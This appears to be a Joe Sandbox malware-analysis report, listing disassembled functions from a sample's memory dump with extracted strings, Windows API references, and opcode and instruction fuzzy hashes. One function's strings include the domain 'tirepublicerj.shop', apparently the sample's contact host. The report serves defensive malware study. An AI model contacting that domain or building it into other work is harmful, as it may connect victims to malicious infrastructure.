Instruction ID: cc871ad810d5ebcc8503e7b8c4c024891cf7c86b0654bd3a3462fcbae073f9f9
Opcode Fuzzy Hash: 0d51a4dc2fe6236f60cf615c35f494bc4f8871562ce58d512750188790d88ec3
Instruction Fuzzy Hash: 0B41ABB010C7818FE310EF78944936FBFE0AB96308F09496EE4C586282D67C858DD7A7

Function 0043C6C0 Relevance: 9.1, Strings: 7, Instructions: 361COMMON

Download Yara Rule

Strings

O, xrefs: 0043C99B
>, xrefs: 0043CA51
g, xrefs: 0043C9A0
q, xrefs: 0043C991
f, xrefs: 0043CA5B
A, xrefs: 0043C996
j, xrefs: 0043CA56

Memory Dump Source

Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Similarity

API ID:
String ID: >$A$O$f$g$j$q
API String ID: 0-654885204
Opcode ID: 6e719cf540110b28232b330fd9c3123724b655a2ede16ab93559da8430dfb06e
Instruction ID: 933c444832a5593444b97503960d5bfec1f1b34db4cd747dab4759e8adc9f3c2
Opcode Fuzzy Hash: 6e719cf540110b28232b330fd9c3123724b655a2ede16ab93559da8430dfb06e
Instruction Fuzzy Hash: DAD1F633A0C7D04AD324853C889535BAEC25BE6324F1D8B7EE9F5973C6D66D88068357

Function 00428B10 Relevance: 8.0, Strings: 6, Instructions: 513COMMON

Download Yara Rule

Strings

we`k, xrefs: 00429A2F
|A, xrefs: 00429544
x}{z, xrefs: 00429A3F
LUC_, xrefs: 00429A17
Gt, xrefs: 0042953C
J[, xrefs: 0042954C

Memory Dump Source

Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Similarity

API ID:
String ID: Gt$J[$LUC_$we`k$x}{z$|A
API String ID: 0-4062276182
Opcode ID: a80706b1bcf71f0eeb055f17b4aa1439f32228796d62799fc01b238a482912c0
Instruction ID: f20c1733954f3d7476a331e7578cdc678171662c1333d6829e8b94656b24469a
Opcode Fuzzy Hash: a80706b1bcf71f0eeb055f17b4aa1439f32228796d62799fc01b238a482912c0
Instruction Fuzzy Hash: 080200B5A08350CBD3209F25D84176BBBE2FFC6318F454A6DE5C85B390DB799805CB8A

Function 00419B30 Relevance: 6.2, APIs: 2, Strings: 1, Instructions: 947COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?), ref: 00419FF7
FreeLibrary.KERNEL32(?), ref: 0041A039

Part of subcall function 00442080: LdrInitializeThunk.NTDLL(0044523A,?,00000018,?,?,00000018,?,?,?), ref: 004420AE

Strings

mj, xrefs: 00419F08

Memory Dump Source

Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Similarity

API ID: FreeLibrary$InitializeThunk
String ID: mj
API String ID: 764372645-1022201683
Opcode ID: c086cc875a9495cf51c40eac8dc5e50a76db1f680bda795562031d64835a4f2b
Instruction ID: e4b45be28fd4c7cbff433e2c06fe463db16693d42f5f124cafcdabba2620905a
Opcode Fuzzy Hash: c086cc875a9495cf51c40eac8dc5e50a76db1f680bda795562031d64835a4f2b
Instruction Fuzzy Hash: D76223746093009FE724CF25CC507ABBBE2BB85318F24861EE594573A1E7399C96CB4B

Function 00425DA0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 232COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 00425E98
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 00425F24

Strings

23, xrefs: 00425E1F

Memory Dump Source

Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: 23
API String ID: 237503144-326707096
Opcode ID: 68f62ab6bbdc17d543da7d6c80b4e2832be22e5d8e63cefdd40be9526a9cccd6
Instruction ID: b6730ddf130f4e2a19c05504fd255247e3d11648143caf2c2a016be5e81be571
Opcode Fuzzy Hash: 68f62ab6bbdc17d543da7d6c80b4e2832be22e5d8e63cefdd40be9526a9cccd6
Instruction Fuzzy Hash: 7B7112B1A043189FEB20CFA8D841BEEBBB1FB45304F10843DE905AB2C5D775590ACB89

Function 00429917 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 00429C9A

Strings

67, xrefs: 00429C0E

Memory Dump Source

Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: 67
API String ID: 237503144-1886922373
Opcode ID: efaa971be64e3f0e55855db326838b403e2c0136300b1c41449d082944818f00
Instruction ID: a5821a17d697f7f316c5e23e8fd2eb7e472b5f5b3478a77b5a5598d7e69c89e3
Opcode Fuzzy Hash: efaa971be64e3f0e55855db326838b403e2c0136300b1c41449d082944818f00
Instruction Fuzzy Hash: 6D61F0B66083408BD724DF29E88175FB7E1EBC9304F18493DE58997281DB35D905CB8A

Function 00429B7B Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 217COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 00429C9A

Strings

67, xrefs: 00429C0E

Memory Dump Source

Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: 67
API String ID: 237503144-1886922373
Opcode ID: 38b103ba2a0b24bd1f0b7068b570aa69e159151b381139e18933ad9306aeec92
Instruction ID: 7ba92da05bbbaddbc1e3305b36c9b0db2ded0e94f959a81563e8173db3a816b3
Opcode Fuzzy Hash: 38b103ba2a0b24bd1f0b7068b570aa69e159151b381139e18933ad9306aeec92
Instruction Fuzzy Hash: A961FEB66083408FD724DF25D88176FBBE2EBC9304F19493DE5898B281DB75C805CB8A

Function 00427FC0 Relevance: 5.4, Strings: 4, Instructions: 431COMMON

Download Yara Rule

Strings

#C}, xrefs: 00428438
@-, xrefs: 0042814C
vC, xrefs: 00428162
up, xrefs: 00428157

Memory Dump Source

Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Similarity

API ID:
String ID: #C}$@-$up$vC
API String ID: 0-3794437364
Opcode ID: fe4f9d4565ffa40ec65875b6bd9e8bbb556a4c85dd3c3c1a3913f1bfe2a2c7a4
Instruction ID: 145fb0a50be3e303ead08e2671ce65b3aa3df702a645c1f6ac8533401e1fa356
Opcode Fuzzy Hash: fe4f9d4565ffa40ec65875b6bd9e8bbb556a4c85dd3c3c1a3913f1bfe2a2c7a4
Instruction Fuzzy Hash: 9FE1EBB5209340DFE324DF25E88076FBBE1FB86304F54882EE5898B251DB35D945CB9A

Function 0041906A Relevance: 5.3, Strings: 4, Instructions: 328COMMON

Download Yara Rule

Strings

u, xrefs: 004193AF
J, xrefs: 004194C6
67, xrefs: 00419200
wq, xrefs: 00419150

Memory Dump Source

Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Similarity

API ID:
String ID: 67$J$u$wq
API String ID: 0-4028943437
Opcode ID: 9816c7c8f30c88303995e0134799a24946b230c62976ec73ca8666db259d96e2
Instruction ID: 45cabc22797d8237a69fda20461bdfe49cb428b8aed426b658ce7b40843b0e88
Opcode Fuzzy Hash: 9816c7c8f30c88303995e0134799a24946b230c62976ec73ca8666db259d96e2
Instruction Fuzzy Hash: 2AB176B04483828BD7348F25C4A17EBBBE1EF92314F14892DD8D94B785E7794886CB87

Function 004437D0 Relevance: 4.4, Strings: 3, Instructions: 647COMMON

Download Yara Rule

Strings

UUK, xrefs: 00443D79
M;D, xrefs: 00443AF2
>D, xrefs: 00443ED1

Memory Dump Source

Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Similarity

API ID:
String ID: M;D$>D$UUK
API String ID: 0-3649699930
Opcode ID: 8ead049028bc91adeff9622f45da0367f919806cf8365be0a15fc24cee2962a3
Instruction ID: fc75cb93acbb787b45c4a477a4821f2fed63727632898f6dbcded6a89fb42fc6
Opcode Fuzzy Hash: 8ead049028bc91adeff9622f45da0367f919806cf8365be0a15fc24cee2962a3
Instruction Fuzzy Hash: 8E22FE3AA08310CFD314DF29E89072BB7E2FB8A315F4A887DD58987361E674D941CB85

Function 004438E0 Relevance: 4.3, Strings: 3, Instructions: 577COMMON

Download Yara Rule

Strings

UUK, xrefs: 00443D79
M;D, xrefs: 00443AF2
>D, xrefs: 00443ED1

Memory Dump Source

Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Similarity

API ID:
String ID: M;D$>D$UUK
API String ID: 0-3649699930
Opcode ID: a4518d19f3d5ce0a92a9632ab1dce3ca5ef1e8b59513adf0c60c32138287e5c1
Instruction ID: 5b6f0a5fe011b24c48fd64f61fb35041aa1557f3f4dce62c9b8353607a503f3b
Opcode Fuzzy Hash: a4518d19f3d5ce0a92a9632ab1dce3ca5ef1e8b59513adf0c60c32138287e5c1
Instruction Fuzzy Hash: 5402DD39A08310CFE314CF29D89072BB7E2BBDA305F4A887DD589873A1D675D945CB85

Function 004438FB Relevance: 4.3, Strings: 3, Instructions: 566COMMON

Download Yara Rule

Strings

UUK, xrefs: 00443D79
M;D, xrefs: 00443AF2
>D, xrefs: 00443ED1

Memory Dump Source

Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Similarity

API ID:
String ID: M;D$>D$UUK
API String ID: 0-3649699930
Opcode ID: 0e38d297613c04bad4889370033c92b5e70b601f85af2d172c698d41d8b03cdb
Instruction ID: 0ffe7b29edef83b041ea382641fdc4149dbc112461c51243b49d827887b3597f
Opcode Fuzzy Hash: 0e38d297613c04bad4889370033c92b5e70b601f85af2d172c698d41d8b03cdb
Instruction Fuzzy Hash: 2202DD3AA08310CFD314CF29D89072BB7E2BBDA305F4A887DD589873A2D675D945CB85

Function 004438F9 Relevance: 4.3, Strings: 3, Instructions: 565COMMON

Download Yara Rule

Strings

UUK, xrefs: 00443D79
M;D, xrefs: 00443AF2
>D, xrefs: 00443ED1

Memory Dump Source

Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Similarity

API ID:
String ID: M;D$>D$UUK
API String ID: 0-3649699930
Opcode ID: f19334b376416346e53576ffb4c07c93724e4cf39114a0a055eb46b0a26280a2
Instruction ID: 86640fba6bac160b05b0c43110ab63d66e8f7ec2f5acf9dcdae8f0d28c6b6e57
Opcode Fuzzy Hash: f19334b376416346e53576ffb4c07c93724e4cf39114a0a055eb46b0a26280a2
Instruction Fuzzy Hash: 8002ED3AA08310CFD314CF29D89072BB7E2BBDA305F4A887DD589873A1D675D945CB85

Function 00440B00 Relevance: 4.3, Strings: 3, Instructions: 555COMMON

Download Yara Rule

Strings

S"(w, xrefs: 00440BF0
f, xrefs: 00440DAA
S"(w, xrefs: 00440E4F

Memory Dump Source

Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Similarity

API ID: InitializeThunk
String ID: S"(w$S"(w$f
API String ID: 2994545307-891790955
Opcode ID: 28c41b0127d726451ed3b83d71238d17b12bdb257359ab4ca56fde3cc06b6e27
Instruction ID: 3cfac3c3f928c660201977811b78d3d3052ee887d4b0c26ff85acd92e20ac89e
Opcode Fuzzy Hash: 28c41b0127d726451ed3b83d71238d17b12bdb257359ab4ca56fde3cc06b6e27
Instruction Fuzzy Hash: B412E1756083508FE324CF19C880B2BBBE1BBC9314F148A6EE9D45B3A1D775AC45CB96

Function 00443A30 Relevance: 4.2, Strings: 3, Instructions: 488COMMON

Download Yara Rule

Strings

UUK, xrefs: 00443D79
M;D, xrefs: 00443AF2
>D, xrefs: 00443ED1

Memory Dump Source

Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Similarity

API ID:
String ID: M;D$>D$UUK
API String ID: 0-3649699930
Opcode ID: 20f685b36d0ed9b593ab140bfc3a35f81c9690bbd879fe733f4b8e7e4bc2cfe5
Instruction ID: 631fa3f1d4c0726364ceec28ad2e892877ef6bcbce7aa5fcc49a4e7daf9cf800
Opcode Fuzzy Hash: 20f685b36d0ed9b593ab140bfc3a35f81c9690bbd879fe733f4b8e7e4bc2cfe5
Instruction Fuzzy Hash: DAE1FE39B09321CFD304DF29D89072AB7E2FB9A311F4A887DD589873A2D634D941CB85

Function 004239EB Relevance: 4.2, Strings: 3, Instructions: 458COMMON

Download Yara Rule

Strings

A0CAAC5595236522822D1F4978021086, xrefs: 00423CE9
tirepublicerj.shop, xrefs: 00424034
yD, xrefs: 00423BFC

Memory Dump Source

Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Similarity

API ID:
String ID: A0CAAC5595236522822D1F4978021086$tirepublicerj.shop$yD
API String ID: 0-3029881286
Opcode ID: 9f06e29270f24890e1894be452b6b26ef11b3f3b9a52aa199204e3ccf518dae8
Instruction ID: ea6ce95d3b2e4101921536522c50bf2979d69fc2778ed717b5a7399473229c95
Opcode Fuzzy Hash: 9f06e29270f24890e1894be452b6b26ef11b3f3b9a52aa199204e3ccf518dae8
Instruction Fuzzy Hash: BF322951608BD28DD326CB7C8848355BF912B27228F1C87DDD1E94F3D3D2AA8587C7A6

Function 00422370 Relevance: 4.2, Strings: 3, Instructions: 457COMMON

Download Yara Rule

Strings

-jkhanold~m`, xrefs: 004224CE
d~m`, xrefs: 004224B5
anold~m`, xrefs: 004224DA

Memory Dump Source

Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Similarity

API ID:
String ID: -jkhanold~m`$anold~m`$d~m`
API String ID: 0-185452761
Opcode ID: d49d82f6dee0b69ccdeb9ac9c72559ba4ec1d23df509649ca449329d3e76b77d
Instruction ID: c4d8edb6bc4b196318c262ba746bf01715a487006edf2819d48878c0ea44a364
Opcode Fuzzy Hash: d49d82f6dee0b69ccdeb9ac9c72559ba4ec1d23df509649ca449329d3e76b77d
Instruction Fuzzy Hash: C8D1BBB06083509FD710DF68D892B6BBBE0FF85318F54491DE8958B392E7B8D809CB56

Function 00443AC0 Relevance: 4.2, Strings: 3, Instructions: 453COMMON

Download Yara Rule

Strings

UUK, xrefs: 00443D79
M;D, xrefs: 00443AF2
>D, xrefs: 00443ED1

Memory Dump Source

Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Similarity

API ID:
String ID: M;D$>D$UUK
API String ID: 0-3649699930
Opcode ID: 09983b5af298ebc2ab7316e1a61d0fcd52d55aeb2db287e4587fee054be01b28
Instruction ID: ab5f315b9e91ee1687aa44fd25e1738b775e8891b6341d15c5394949b1c7dc9f
Opcode Fuzzy Hash: 09983b5af298ebc2ab7316e1a61d0fcd52d55aeb2db287e4587fee054be01b28
Instruction Fuzzy Hash: 53D1FF3AA08310CFD314DF29D89072AB7E2FBDA310F4A897DE58987392D674D941CB85

Function 00421180 Relevance: 4.2, Strings: 3, Instructions: 428COMMON

Download Yara Rule

Strings

<`>f, xrefs: 00421337
8deZ, xrefs: 00421342
567, xrefs: 004216A5

Memory Dump Source

Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Similarity

API ID:
String ID: 8deZ$<`>f$567
API String ID: 0-937435233
Opcode ID: e36a9dac6d3b109f9905b89e82cd006d81b84e837a4896d73091fcfb4276f145
Instruction ID: 754c1abd1b676f1653a7a5478e22f099d0a2726f3b1f9a9f143ecbe85e8fc021
Opcode Fuzzy Hash: e36a9dac6d3b109f9905b89e82cd006d81b84e837a4896d73091fcfb4276f145
Instruction Fuzzy Hash: 99D1FFB06083208BD720DF24C851B6BB7F2FFE1354F498A6DE4858B3A5E3799845C756

Function 0043099F Relevance: 4.0, Strings: 3, Instructions: 251COMMON

Download Yara Rule

Strings

.^Nw, xrefs: 00430C54
ut, xrefs: 00430B4D
QRP,, xrefs: 00430C49

Memory Dump Source

Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Similarity

API ID:
String ID: ut$.^Nw$QRP,
API String ID: 0-2489489831
Opcode ID: 98cbce0613518649870af1c8974656c71542a717d1b33c78eb897c39670c9cda
Instruction ID: c8479f28a28c815cfbd9d5fc95f9476b123213feaa6e9ea5c0c948cebaf48d73
Opcode Fuzzy Hash: 98cbce0613518649870af1c8974656c71542a717d1b33c78eb897c39670c9cda
Instruction Fuzzy Hash: 3B710A7110D3918FD3258B2588B03E7BBD19FDB704F585A5DD0CA4B341DB794906CB56

Function 0040F2D0 Relevance: 3.9, Strings: 3, Instructions: 168COMMON

Download Yara Rule

Strings

K, xrefs: 0040F38E
, xrefs: 0040F44B
:, xrefs: 0040F2F5

Memory Dump Source

Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Similarity

API ID:
String ID: $:$K
API String ID: 0-296352136
Opcode ID: d4ea87c64e246af4978a154c8bcba0dae997269c38e308e349982c1911dc0664
Instruction ID: e3fd2fc2a8267f717fe0e7e766dd9ea259cde5192962e3fe240e8cbdfa04c585
Opcode Fuzzy Hash: d4ea87c64e246af4978a154c8bcba0dae997269c38e308e349982c1911dc0664
Instruction Fuzzy Hash: 3A51A27250C7908AD7209B3884543AFBBD0AB96334F190F7EE8EAE73C1E67885458757

Function 00404E20 Relevance: 3.3, Strings: 2, Instructions: 792COMMON

Download Yara Rule

Strings

8, xrefs: 00405733
0, xrefs: 0040573B

Memory Dump Source

Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Similarity

API ID:
String ID: 0$8
API String ID: 0-46163386
Opcode ID: 9b65179c85595c414a48b5f661f94d2ee029877bb6922c8c96a9a243c101c061
Instruction ID: 19de03d7aa05240092aa3acb4ee1ab33a8cd98421fbae1c194af479a45b94dce
Opcode Fuzzy Hash: 9b65179c85595c414a48b5f661f94d2ee029877bb6922c8c96a9a243c101c061
Instruction Fuzzy Hash: 3B720171508740AFD710CF18C884BABBBE1EB88314F44892EF9999B391D379D958CF96

Function 0041F9A0 Relevance: 3.3, Strings: 2, Instructions: 771COMMON

Download Yara Rule

Strings

/B, xrefs: 00420402
nB, xrefs: 004203B8

Memory Dump Source

Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Similarity

API ID:
String ID: /B$nB
API String ID: 0-3787476056
Opcode ID: 8cc1b13c1102e30db294b922f2599dfa790129c5d8f004719a222694663e08f2
Instruction ID: 01d0190d3bb0ccc58f1444bdf38ba46b89cc646c5dd88bcfe1081667cb01010c
Opcode Fuzzy Hash: 8cc1b13c1102e30db294b922f2599dfa790129c5d8f004719a222694663e08f2
Instruction Fuzzy Hash: 3E7270B0509B808FD3658F3C8855797BFD5AB5A324F148A5EE0FE873D2C77960018B6A

Function 0042BA20 Relevance: 3.1, APIs: 2, Instructions: 146COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,00000000,?), ref: 0042BB95
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,?,?), ref: 0042BC1E

Memory Dump Source

Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID:
API String ID: 237503144-0
Opcode ID: 08dab3ac1c3e682bcbc351f775dd6a9a04cbb622e72c41a6e431c472b400fc88
Instruction ID: 88c8716360a9849faea0ff28cefb8e51f229f873179c28473aebd70c66339d06
Opcode Fuzzy Hash: 08dab3ac1c3e682bcbc351f775dd6a9a04cbb622e72c41a6e431c472b400fc88
Instruction Fuzzy Hash: 28513672519350CFE324CF76DC8075BBBA2FBC2304F16862DE5951B290CBB984068B86

Function 00422880 Relevance: 3.0, Strings: 2, Instructions: 455COMMON

Download Yara Rule

Strings

27, xrefs: 00422934
!', xrefs: 0042289A

Memory Dump Source

Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Similarity

API ID:
String ID: !'$27
API String ID: 0-1982139352
Opcode ID: f59c36ea8d3009de80897bc285a486c4a8992c853654d8c5358ed7f8b9326bec
Instruction ID: 5153aecd17f80642fd8c0eece016e91168ea77982d201b76830abc39117f0e9e
Opcode Fuzzy Hash: f59c36ea8d3009de80897bc285a486c4a8992c853654d8c5358ed7f8b9326bec
Instruction Fuzzy Hash: F5C156B57083109BD7149F29DD9276BB7E1EF81314F88852EE8C58B391E6BCD904C35A

Function 00443B60 Relevance: 2.9, Strings: 2, Instructions: 441COMMON

Download Yara Rule

Strings

UUK, xrefs: 00443D79
>D, xrefs: 00443ED1

Memory Dump Source

Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Similarity

API ID:
String ID: >D$UUK
API String ID: 0-1347512165
Opcode ID: e0386ec59c16bdf8c29cd5a48f3d704c8f1d2f3bb815fb722162d041929130e6
Instruction ID: 5ece47969d2e4495fd744cec34393a228d2be6badad345384a3b8f4f4ab2efe2
Opcode Fuzzy Hash: e0386ec59c16bdf8c29cd5a48f3d704c8f1d2f3bb815fb722162d041929130e6
Instruction Fuzzy Hash: 86D1EE35A08310CFD314DF29D89072BB7E2BBDA300F4A897DE98997392D675D941CB86

Function 00429F7C Relevance: 2.9, Strings: 2, Instructions: 421COMMON

Download Yara Rule

Strings

rYaT, xrefs: 00429FE8
ji46, xrefs: 00429FA4

Memory Dump Source

Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Similarity

API ID:
String ID: ji46$rYaT
API String ID: 0-3893754386
Opcode ID: 50b9503766fda6a3b299027e53f19a6ac61b732975699a3fa8b313e916dca586
Instruction ID: dcd566aaca25f8eff7100027eceeae2756314058decd7535bc98b9674378a6ea
Opcode Fuzzy Hash: 50b9503766fda6a3b299027e53f19a6ac61b732975699a3fa8b313e916dca586
Instruction Fuzzy Hash: 1BE1F132A08351CFD314CF29D88035AB7E2FFCA324F698A6DE995572A1D734DC158B86

Function 004195B6 Relevance: 2.9, Strings: 2, Instructions: 363COMMON

Download Yara Rule

Strings

^\, xrefs: 004198D8
=, xrefs: 004197CC

Memory Dump Source

Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Similarity

API ID:
String ID: =$^\
API String ID: 0-3808277151
Opcode ID: 3ae2f5be3b5b97ffa114b6693e049356c5b1626121661ef7d8dd4ce1dd7da5ce
Instruction ID: 449fbb577030d5845b3ff3c78ea8df1dbbecff39a5bc4c3e86ed8d0a83d476b4
Opcode Fuzzy Hash: 3ae2f5be3b5b97ffa114b6693e049356c5b1626121661ef7d8dd4ce1dd7da5ce
Instruction Fuzzy Hash: 20B1E6B56483428BD328DF25C8A07ABBBE1EFD5315F08892DE4D58B381E77C8845C796

Function 0042F1C1 Relevance: 2.8, Strings: 2, Instructions: 284COMMON

Download Yara Rule

Strings

H, xrefs: 0043046D
6, xrefs: 00430397

Memory Dump Source

Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Similarity

API ID:
String ID: 6$H
API String ID: 0-1447585844
Opcode ID: c35a03f4cf591df4d4aceba60bc50ce8e51cc17a99ecf9a3f38fb7b5001c7353
Instruction ID: 70973cbbd1d345abe4e026803d5a60bd6a74268ec64029004c3dfe15c300f41f
Opcode Fuzzy Hash: c35a03f4cf591df4d4aceba60bc50ce8e51cc17a99ecf9a3f38fb7b5001c7353
Instruction Fuzzy Hash: 80814B716083914FD318CB29C8A136BBBE09FA6304F18996EE5D58B392D67DC806CB56

Function 0043025E Relevance: 2.8, Strings: 2, Instructions: 282COMMON

Download Yara Rule

Strings

H, xrefs: 0043046D
6, xrefs: 00430397

Memory Dump Source

Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Similarity

API ID:
String ID: 6$H
API String ID: 0-1447585844
Opcode ID: daca0a37e64689617dcb32fcd85fbedc979902d255c1e22abba8b4ae14e2925f
Instruction ID: 66dbb9f7593940bda3bdb21456c4f2af28ce9aa7ca169eb6b940cdf049e341e0
Opcode Fuzzy Hash: daca0a37e64689617dcb32fcd85fbedc979902d255c1e22abba8b4ae14e2925f
Instruction Fuzzy Hash: 4B814C716083914FD718CB39C8A136BBBE09FA6304F18D96EE5D587382D67DC806CB56

Function 004302CD Relevance: 2.8, Strings: 2, Instructions: 281COMMON

Download Yara Rule

Strings

H, xrefs: 0043046D
6, xrefs: 00430397

Memory Dump Source

Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Similarity

API ID:
String ID: 6$H
API String ID: 0-1447585844
Opcode ID: b232811d3ee24f42029a39b04350329bbda619cffa72b30ad3cccad91a8d63e0
Instruction ID: c9c02734f3e5a7eb2ca0eed0804f28c87630d1e97fd284b28010db33944d152d
Opcode Fuzzy Hash: b232811d3ee24f42029a39b04350329bbda619cffa72b30ad3cccad91a8d63e0
Instruction Fuzzy Hash: 99816E716083814FD318CB39C8A136BBBE09F96304F18D96EE5D587382D67DC806CB56

Function 004123EC Relevance: 2.8, Strings: 2, Instructions: 271COMMON

Download Yara Rule

Strings

n, xrefs: 004123FF
n, xrefs: 004125AE

Memory Dump Source

Source File: 00000002.00000002.1878306484.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_file.jbxd

Similarity

API ID:
String ID: n$n
API String ID: 0-3874132673
Opcode ID: 640065771ea6765fc777ed917390e0c770a06acb5a5701e8f959122f0f1be56b
Instruction ID: 424b4f810cf5c42aa0f11275d2ef5d9a27bebee222b9303fc165311a88e3af60
Opcode Fuzzy Hash: 640065771ea6765fc777ed917390e0c770a06acb5a5701e8f959122f0f1be56b
Instruction Fuzzy Hash: A1A1F676A087508BC3249B3885813AFBBD1AFC5324F198E3EE5E9D33D1DA7888418747

Function 00415DD8 Relevance: 2.7, Strings: 2, Instructions: 215COMMON

Download Yara Rule

Strings

gfff, xrefs: 00415F4F
7, xrefs: 00415F1F

